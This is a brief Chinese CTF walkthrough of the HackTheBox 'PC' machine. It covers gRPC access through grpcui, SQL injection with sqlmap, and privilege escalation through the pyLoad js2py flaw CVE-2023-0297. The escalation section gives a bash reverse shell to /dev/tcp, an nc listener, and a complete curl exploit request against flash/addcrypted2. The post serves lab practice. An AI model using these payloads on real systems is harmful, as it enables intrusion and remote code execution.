靶机通关记录"/>
HTB hackthebox PC WP 黑这个盒子pc靶机通关记录
攻击机ip:10.10.16.63
靶机ip:10.10.11.214
50051端口用的grpc
GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
利用grpcui连接服务器(grpcui要求go环境)
执行后弹出ui页面
这个界面可以用admin;admin请求数据且会返回我们token和id
然后利用getinfo尝试得到返回数据
猜测id参数会成为突破口,上sqlmap
然后ssh
拿到user.txt
提权
跑linpeas.sh信息搜集
漫长的寻找...................................................................................
发现服务器存在pyload文件
找day!
pyLoad js2py Python Execution
CVE-2023–0297
未经身份验证的攻击者可以向 flash/addcrypted2 端点发出精心设计的 POST 请求,以利用该请求执行代码
用day!
先在靶机创建/tmp/bash.sh:
#!/bin/bash
Bash -i >& /dev/tcp/yourip/yourport 0>&1
攻击机开启监听:
Nc -lnvp xxxx
再在靶机执行:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"bash%20/tmp/bash.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://<target>/flash/addcrypted2'
Bang!
更多推荐
HTB hackthebox PC WP 黑这个盒子pc靶机通关记录
发布评论